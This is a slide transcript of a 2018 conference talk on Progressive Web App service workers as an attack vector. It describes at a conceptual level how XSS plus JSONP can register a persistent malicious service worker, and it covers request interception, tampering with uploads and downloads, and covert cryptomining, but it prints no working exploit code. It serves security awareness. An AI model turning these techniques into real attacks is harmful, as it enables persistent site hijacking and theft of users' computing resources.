Upgrade to Pro — share decks privately, control downloads, hide ads and more …

PWA as a New Cyber Attack Vector

PWA as a New Cyber Attack Vector

Progressive Web Apps - one of the hottest topics of last years. It is populated by big companies and become competition for native applications. The main API for PWA creation is Service Workers. But have you thought about it as a possible browsers vulnerability? Is it secure enough? Should users use it carefully? All those questions are very actual in times when almost all vendors have implemented or put in development Service Workers support.

Vitalii Bobrov

May 10, 2018
Tweet

More Decks by Vitalii Bobrov

Other Decks in Programming

Transcript

  1. PWA as a New
    Cyber Attack Vector

    View full-size slide

  2. @bobrov1989
    Vitalii Bobrov
    • tech experimentator
    • more than 5 years in front-end
    • open-source contributor
    • mentor
    https:/
    /vitaliy-bobrov.github.io/

    View full-size slide

  3. What are you, PWA?

    View full-size slide

  4. –MDN
    “PWA use modern web APIs along with
    progressive enhancement strategy to create
    cross-platform web apps…
    …provide several features that give them the
    same UX advantages as native apps. ”
    https:/
    /developer.mozilla.org/en-US/Apps/Progressive

    View full-size slide

  5. Features
    • offline capabilities
    • notifications
    • background sync
    • real app experience

    View full-size slide

  6. Service Worker
    The ❤ and of PWA

    View full-size slide

  7. What are you,
    Service Worker?

    View full-size slide

  8. Service Worker is an
    event-driven worker playing as a
    proxy middleware
    Browser
    SW
    Network

    View full-size slide

  9. Availability
    ?

    View full-size slide

  10. Possibilities
    • executed in separate thread
    • could intercept all app requests
    • access to cache storage
    • could live without browser

    View full-size slide

  11. Responsibility
    Use the FORCE in the RIGHT way

    View full-size slide

  12. Security Restrictions
    • requires HTTPS
    • served from same origin
    • executes in limited SW context
    • terminated after job completion

    View full-size slide

  13. SW lifecycle
    No Service Worker
    Install
    Active Error
    Idle
    Terminated Fetch / Message

    View full-size slide

  14. Installation
    Hidden UX

    View full-size slide

  15. chrome:/
    /inspect/#service-workers

    View full-size slide

  16. chrome:/
    /serviceworker-internals/

    View full-size slide

  17. Register by link
    XSS + JSONP + Service Worker

    View full-size slide

  18. JSONP for XSS
    • my-domain.com/jsonp?callback=myCallback
    • no XHR
    • === Same Origin Policy doesn’t apply<br/>• myCallback in global scope<br/>

    View full-size slide

  19. Service Worker makes
    XSS attack persistent
    https:/
    /c0nradsc0rner.wordpress.com/2016/06/17/xss-persistence-using-jsonp-and-serviceworkers/
    https:/
    /www.owasp.org/images/3/35/2017-04-20-JSONPXSS.pdf

    View full-size slide

  20. Decoded & Formatted

    View full-size slide

  21. HTTP Interceptor
    ALL Requests Controlled by

    View full-size slide

  22. https:/
    /jakearchibald.github.io/isserviceworkerready/demos/fetchevent/

    View full-size slide

  23. https:/
    /jakearchibald.github.io/isserviceworkerready/demos/fetchevent/

    View full-size slide

  24. https:/
    /jakearchibald.github.io/isserviceworkerready/demos/fetchevent/

    View full-size slide

  25. Service Worker could
    kill browser extensions

    View full-size slide

  26. Modify
    uploads & downloads

    View full-size slide

  27. Use Web Assembly
    to perform modifications ⚡ fast

    View full-size slide

  28. https:/
    /medium.com/@kennethrohde/on-the-fly-webp-decoding-using-wasm-and-a-service-worker-33e519d8c21e

    View full-size slide

  29. Use Resources
    perform computing on remote machine

    View full-size slide

  30. http:/
    /hub.kotofabrika.com/

    View full-size slide

  31. https:/
    /coinhive.com/

    View full-size slide

  32. https:/
    /github.com/cazala/coin-hive

    View full-size slide

  33. Allows to compute
    without browser

    View full-size slide

  34. “Wakeup” APIs
    • SyncManager
    • PushManager
    • postMessage

    View full-size slide

  35. Thank you!
    @bobrov1989
    https:/
    /vitaliy-bobrov.github.io/

    View full-size slide